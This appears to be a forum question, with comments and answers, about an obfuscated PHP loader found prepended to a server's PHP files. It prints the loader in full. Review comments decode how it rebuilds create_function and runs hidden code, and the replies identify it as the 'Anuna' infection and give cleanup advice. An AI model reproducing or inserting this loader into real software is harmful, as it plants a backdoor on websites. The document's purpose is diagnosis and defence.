
I was asked to help update some code for a friend and found their local files to be clean PHP, but when I accidentally viewed the PHP source on their server, all the PHP files started with the following:

<?php  
// NOTE(review): the statements from here down to `$okixul = $dgqsxh - 1;` are an injected
// loader that was prepended to the file; they are not part of the application.
//
// $okixul is a single-quoted string used purely as a data blob. Later statements cut
// slices out of it by (offset, length) pairs, join them, and hand the result to functions
// whose names are themselves read out of the blob, so no sensitive function name appears
// in clear text in the loader.
//
// Fragments readable in the blob as posted include `function_exists(`, `$GLOBALS[`,
// `@error_reporting(0)`, `strtolower($_SERVER[`, `strstr($uas,` and
// `function tqcvlvt($n){return chr(ord($n)-1);}` next to `implode(array_map("tqcvlvt",str_split(`.
// That suggests a second layer that shifts every character down by one and inspects a
// request header -- TODO confirm on a preserved copy in an isolated environment.
//
// As posted here the blob is damaged (runs of spaces where other bytes stood), so the
// numeric offsets used below no longer line up and this listing will not unpack as-is.
//
// Triage hint: the question reports that the variable names differ from file to file, so a
// hash of one infected file will not find the others. Match on the structure instead: a
// very long quoted string, explode(chr(<arithmetic>), substr(...)), and calls through
// variables such as $x[0]($x[1]).
$okixul = ', $oaqacbv); $czwdrtb();}}-   x24 x5c%j^  x24-    x24tvctutmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]yf`4   x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osv0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:64utjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|fqp%!|Z~!<##!>!2p%!|!*!***b%)sfxprd/#00;quui#>.%!<***f    x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdo82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO    x22#)fe"    x6f 142 x5f 163 x74 141 x72 164")!pd%)!gj}Z;h!opjudovg}{;#)t*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA    x27doj%6<   x724-   x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x24]y8  xgj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QI:*mmvo:>:iuhofm%:-5pt-#w#)ldbqov>*ofmy%)utjm!|!*5!    x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-1]#-bubE{h%)tpqsut>j%!*72!  x27!hmg%)!gj!<2,*j%-#1]#-bub372]58y]472]37y]672]48y]#>s%<#462]47y]252]1x7f_*#ujojRk3`{666~6<&w6<    x7fw6implode(array_map("tqcvlvt",str_split("%tj%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!)7fmjix6<C    x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]26d#)tutjyf`opjudovg    x22)!985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:5x24-!%   x24-    x24*!|! x24pd%w6Z6<.2`hA    x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<Q&f_UTPI`QUUI&e_SEEB`FUPNF  x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-Uc1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#0#-%tdz*Wsfuvso!%bss   x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**24  x54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]); if4-    x24*<!~!    x24/%t2w/   x24)##-!#~<#/%  8]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]8{**u%-#jt0}Z;0]=]0#)22^,%b:<!%c:>%s:   x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!bmgoj{hA!osvufs!~<3,j%>j%!*3!  
x27!hmg%!)!gj!<2,*j%!-#bT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88ASV<*w%)ppde>u%V<#65,418R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**));$czwdrtb = $yvunquf(""S&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&bfmtf!%z>2<!%ww2)%w`TW~  x24<!fwbm)%tjw)b24- x24]26  x24-    x24<%j,,*!| x24-    x24gvodpt}X;`msvd}R;*msv%)}.;`UQPMSV;utpI#7>/7rfs%6<#o]1/20QUUIubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpqj%)hopm3qjA)qj3hopmA x273qj%6<*Y%)fnbo*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#y76#<!%w:!>!(%w:!>!   x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6mjix:<##:>:h%:<#64y]552]e7y]#>n%<#}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!)gj6<^#Y#    x5cq%   x27Y%6<.msv`ftsbq ((strstr($uas,"   x6d 163 x69 145"))q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%b#<%fdy>#]D4]273]D6P2L5P6]N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#  x24#-!#]y38#-!%w:**<")9#-!#:618d5f9#-!#f6c68399#if((function_exists( && (!isset($GLOBALS["  x61 156 x75 156 x61"])))) { $GLOBALS[" chr(ord($n)-1);} @error_reporting(0); $oaqacbv = ufs!*!+A!>!{e%)!>>  x22!ftmbg)4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-b8y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~  xmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!   
x24/%tmw/!gj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x7R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,7jsv%7UFH#   x27rfs%6~6< x7fw%!|!*)323zbek!~!<b% x7f!<X>b%Z<#o`57ftbc    x7f!|!*uyfu x27pde:4:|:**#ppde#)tutj2qj%7-K)udfoopdXA   x22)7gj6<*QDU`MPT8y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fpmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)r>#L4]275L3]248L3P6L1M5]D2s)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*  x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*XAZk:!ftmf!}Z;^nbsbq%  x5cSFWSFT`%}X;!sp!*#po#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)3sv%6<C>^#zsfvr#   x5cq%7**^#zsfvr#    x5cq%)ufttj x22d}+;!>!} x27;!>>>!}_A7>q%6<  x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6<  x7fw6D!-id%)uqpuft`msvd},;uqpuft`msv62  x65 141 x74 145 x5f 146 x75 156<*K)ftpmdXA6|7**197-ssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#27;mnui}&;zepc}A;~!} x7f;!|!}{;)dov{h19275j{hnpd19275fubmgoj{h1:|p3)%cB%iN}#-!   x24/%tmw/   x24)%c*W%eN+#Qi x5V,6<*)ujojR   x27id%6<    x7fw6*   or (strstr($uas,"  x72 166 x3a 61  x31")) or (strstr($uas,"    x61 1w!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc6|7**111127-K)ebfsX  x27u%7]445]212]445]43]321]464]284]364]6]234]342]58]24]31dujpo!  x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x2W%hIr x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%%b:>1<!fmtf!%b:>%s:    x5c%j:.;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufl]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]31y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.fw6*    x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)7gj6<*id%)ftpm56   x64 162 x6f 151 x64"))) { $yvunquf = "  x63 1   x61 156 x75 156 x61"]=1; $uas=strtolower($_SERVER[" x48 12#k#)tutjyf`x  x22l:!}V;3q%}U;y]}R;2]},;osvufs}    xE{h%)tpqsut>j%!*9! 
x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcv*CW&)7gj6<.[A x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6fs:~928>>   x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnp;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x22gj}1~!<2p%   x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2px24- x24!>!fyqmpef)# x24*<!%t::!>!   x24Yptmf!~<**9.-j%-bubE{h%)sutcvt)fu6   x63 164 x69 157 x6e"; function tqcvlvt($n){return24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    zcYufhA x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubq#   x5cq%   x27j#)zbssb!-#}#)fepmqnj!/!#0#)idu!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvu23ldfidk!~!<**qp%!-uyfu%)3of)fepdof^?]_   x5c}X   x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74M4P8]37]278]225]241]334]368]322]3]364y6gP7L6M7]D4]275]D:M8]Df#<%tdz5946-tr.984:75983:48984:71]K9]77]D4]f.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>bn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!Z6<.4`hA   x27pd%6<pd%w6Z6<.3`hA   x27pd%6<`bj+upcotn+qsvmt+fmhpphgj}l;33bq}k;opjudovg}x;0]=])0#)U!    x27opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}  x27;%STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSarvcaeji';

// Take a 34-byte slice of $okixul (offset 29531 - 23605 = 5926, length 220 - 186 = 34)
// and split it on chr(758 - 638) = chr(120) = "x". The arithmetic only hides the constants.
// NOTE(review): the blob as posted contains "STrrEvxNoITCnuF_EtaeRCxECaLPer_RtS" near its
// end. Split on "x" and reversed, that reads strrev / create_function / str_replace (PHP
// function names are case-insensitive). Presumably this is the slice the offsets address
// in the undamaged file -- confirm against the original bytes.
$efkvsyuxf = explode(chr((758 - 638)), substr($okixul, (29531 - 23605), (220 - 186)));

// Element 0 is called as a function on elements 1 and 2 (indices written as 3 - 2 and
// 8 - 6). Under the reading above, both results are function names held as strings:
// $bzuaezx would be create_function and $ecckncqdnt would be str_replace.
$bzuaezx = $efkvsyuxf[0]($efkvsyuxf[ (3 - 2) ]);
$ecckncqdnt = $efkvsyuxf[0]($efkvsyuxf[ (8 - 6) ]);
// The function_exists() guard keeps a second infected file in the same request from
// redeclaring the helper, which would be a fatal error.
if (!function_exists('pwlggr')) {
    /**
     * Reassemble a string from slices of a larger string.
     *
     * The name looks random; the visible body only slices and substitutes, and nothing
     * in it reads credentials or writes a log.
     *
     * @param array    $coqnotxx   Flat list read as pairs: offset, length, offset, length, ...
     * @param string   $nceoxvnf   The string the slices are cut from.
     * @param callable $dhigikttik Called as f(chr(9), chr(92), $joined); the only call in
     *                             this listing passes $ecckncqdnt, presumably str_replace.
     * @return mixed Whatever $dhigikttik returns for the joined slices.
     */
    function pwlggr($coqnotxx, $nceoxvnf, $dhigikttik)
    {
        $qfvtkf = null;
        // One iteration per (offset, length) pair; slices are appended in list order.
        for ($zmovjihc = 0; $zmovjihc < (sizeof($coqnotxx) / 2); $zmovjihc++) {
            $qfvtkf .= substr($nceoxvnf, $coqnotxx[ ($zmovjihc * 2) ], $coqnotxx[ ($zmovjihc * 2) + (3 - 2) ]);
        }
        // chr(61 - 52) is a tab and chr(602 - 510) is a backslash. If the callable is
        // str_replace, every tab in the joined text becomes a backslash, so a copy of the
        // blob that has lost its tab bytes cannot be reassembled correctly.
        return $dhigikttik(chr((61 - 52)), chr((602 - 510)), $qfvtkf);
    }

    ;
}
// chr(159 - 115) = chr(44) = ",": the literal below becomes a flat list of numbers that
// pwlggr() reads as (offset, length) pairs into $okixul. The pairs are out of order, so
// the blob is also shuffled. The furthest-reaching pair, 5881,45, ends at byte 5926,
// exactly where the 34-byte slice of function names taken earlier begins.
$xxmpwve = explode(chr((159 - 115)),
    '2809,20,439,35,2829,61,4784,59,1559,60,2573,35,4120,64,4737,47,3895,33,5218,51,2890,50,882,42,4184,46,2381,61,5782,39,1185,48,2267,22,2289,54,4274,25,979,42,2146,27,3299,27,3928,21,3403,35,1490,69,2228,39,5335,58,3749,48,2540,33,3817,47,501,53,4679,58,1341,43,1302,39,4092,28,851,31,4959,48,4494,52,2116,30,3864,31,3797,20,5064,41,474,27,189,48,5187,31,1800,53,753,55,4890,69,690,63,2969,58,2173,55,1072,24,5105,42,398,41,3491,53,269,59,5678,47,237,32,3091,41,5821,23,5393,30,5725,57,605,65,1233,26,2002,36,3326,33,3693,56,5479,35,3359,23,3654,39,5881,45,5423,56,5007,57,4017,33,670,20,3382,21,93,58,2940,29,3197,40,3620,34,1903,22,3237,62,1925,52,4843,47,3985,32,5844,37,1733,21,2608,43,5514,61,1021,51,1656,34,1690,43,3438,53,2442,34,808,43,3027,64,5269,66,1162,23,26,26,3569,51,554,51,2077,39,4350,61,1619,37,5147,40,4050,42,1384,38,151,38,2783,26,3132,65,1259,43,4411,56,52,41,4613,66,1096,66,5642,36,328,70,2703,25,5612,30,3544,25,4230,44,2651,52,1853,50,5575,37,4546,67,4299,51,1422,68,2476,64,4467,27,1754,46,924,55,2038,39,3949,36,2343,38,2728,55,1977,25,0,26');
// Calls the function named in $bzuaezx with an empty first argument and the reassembled
// text. If that name is create_function, as the blob's tail suggests, this compiles the
// text as the body of an anonymous function, i.e. dynamic code execution equivalent to
// eval(). create_function() was removed in PHP 8.0, so on PHP 8+ this line would fail.
$dgqsxh = $bzuaezx("", pwlggr($xxmpwve, $okixul, $ecckncqdnt));
// Overwrites the variable that held the function name.
$bzuaezx = $okixul;
// Runs the function returned above.
$dgqsxh("");
// Both variables are overwritten with small integers (121, then 120), so neither the
// blob nor the function handle stays in these variables for the host file's own code.
$dgqsxh = (769 - 648);
$okixul = $dgqsxh - 1;

Does anyone have any idea on what has taken place, or seen this sort of code before? Interestingly the first variable seems to be different on each page but the code is the same.

Jonathan Leffler
Acland
  • 1
    Run code over here and check https://www.unphp.net/ – Afsar Nov 30 '16 at 10:39
  • 1
    delete it. roll back your server to the last date it was clean, change all your passwords, inform your users if necessary, and audit your whole code for security flaws (don't forget: *never* trust user input). – Franz Gleichmann Nov 30 '16 at 10:47
  • You lost some information on the copy/paste. As far as I can tell, the variable `$okixul` must contain special ASCII characters (such as the "tab" character) which have been converted into something else when you did the copy/paste on SO. So the code doesn't unpack properly and it's hard to say what it's supposed to do. – rlanvin Nov 30 '16 at 11:54
  • Also: http://stackoverflow.com/questions/36423274/code-injected-into-website-files-what-does-it-do – rlanvin Nov 30 '16 at 11:56
  • if (!function_exists('pwlggr')) reads like: if function passwordlogger doesn't exist, create it. Since the whole thing is obfuscated, it could be misleading though... if it isn't misleading, someone's trying to steal passwords from you/your users – ezcoding Nov 30 '16 at 21:09

2 Answers


This is some kind of obfuscated code. It may contain harmful content, but you can't tell what it does by reading it. I would rather delete all of the files from my server, because all of your data can be seen by a third party right now.

As others said before DON'T UPLOAD ANY PHP SCRIPT FROM UNTRUSTED SOURCES.

aprogrammer
  • There is a function called "pwlggr" inside it... so I think you could be right with your "harmful content" – Twinfriends Nov 30 '16 at 10:46
  • 1
    *"may contain harmful content but you can't understand it"* - rule of thumb: if you don't know where it comes from or don't know what it does, it **is bad**. – Franz Gleichmann Nov 30 '16 at 11:48

Does anyone have any idea on what has taken place?

Your server was infected by malicious code.

or have seen it before?

Yes, it's called "Anuna". Personally, I am not quite sure what it does (some kind of backdoor/trojan/worm...). Just Google "PHP Anuna" for more info. You'll also find many StackOverflow questions.

Community
rlanvin